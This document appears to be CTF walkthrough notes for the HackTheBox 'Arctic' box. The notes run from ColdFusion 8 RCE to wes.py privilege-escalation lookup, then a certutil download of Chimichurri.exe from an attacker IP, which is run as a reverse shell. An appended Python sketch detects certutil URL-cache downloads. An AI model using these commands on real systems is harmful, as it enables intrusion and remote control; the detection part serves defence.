nmap shows an unknown service running on port 8500.
We browse to it and find something called CFIDE.
Googling it turns up a vulnerability listed on Rapid7.
We know it’s CF8, so we Google the specific version + “exploit” and get one:
How to use:
python3 AdobeCF8RCE.py
From shell:
Steps/tools I forgot:
Taking systeminfo:
systeminfo
and running it through the suggester:
cd /home/kali/wesng
./wes.py /home/kali/Desktop/HackTheBox/Arctic/systeminfo.txt
We get 200+!
To grep for just Elevation:
./wes.py /home/kali/Desktop/HackTheBox/Arctic/systeminfo.txt | grep -B 7 -A 1 'Elevation'
Navigate to the user folder:
cd c:\users\tolis
certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe
Chimichurri.exe 10.10.14.13 5555
We can check whether we can impersonate admin:
whoami /priv
How to use an AbuseFunction:
Write whatever comes right after the ‘:’, like:
AbuseFunction: H5a-H5o
#would be
H5a-H5o
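From the defender's side, the certutil -urlcache -f download used above leaves a distinctive process command line. The following is an added example, not part of the original notes: a detection sketch that parses process-creation command lines and flags certutil URL-cache downloads. The sample log lines, the function name and the extension list are constructed assumptions.

```python
import re
import shlex
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 style).
SAMPLE_CMDLINES = [
    r'certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe',
    r'"C:\Windows\System32\CertUtil.exe" /URLCache /f https://cdn.example.test/a.txt a.txt',
    r'certutil -hashfile C:\temp\setup.msi SHA256',   # benign use, must not alert
    r'cmd /c echo certutil is installed',             # string match only, not the image
]
EXEC_EXT = ('.exe', '.dll', '.ps1', '.bat')           # assumed list, tune per environment

def detect_certutil_download(cmdline):
    """Return a finding dict if cmdline is a certutil URL-cache download, else None."""
    try:
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                      # unbalanced quotes: plain whitespace split
        tokens = cmdline.split()
    if not tokens:
        return None
    image = re.split(r'[\\/]', tokens[0])[-1].lower()
    if image not in ('certutil', 'certutil.exe'):
        return None
    args = tokens[1:]
    # certutil accepts '-' or '/' as the option prefix, in any letter case.
    flags = {a[1:].lower() for a in args if a[:1] in ('-', '/')}
    url = next((a for a in args if re.match(r'(?i)(https?|ftp)://', a)), None)
    if 'urlcache' not in flags or url is None:
        return None
    host = urlsplit(url).hostname or ''
    try:
        ip_address(host)
        raw_ip = True                       # raw IP hosts are rare in legitimate use
    except ValueError:
        raw_ip = False
    after = [a for a in args[args.index(url) + 1:] if a[:1] not in ('-', '/')]
    dest = after[0] if after else None
    return {'url': url, 'dest': dest, 'raw_ip_host': raw_ip,
            'writes_executable': bool(dest) and dest.lower().endswith(EXEC_EXT)}

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(detect_certutil_download(line), '<-', line)
```

A finding with both raw_ip_host and writes_executable set is the high-confidence case; the same logic translates directly into a SIEM rule on the process image and command-line fields.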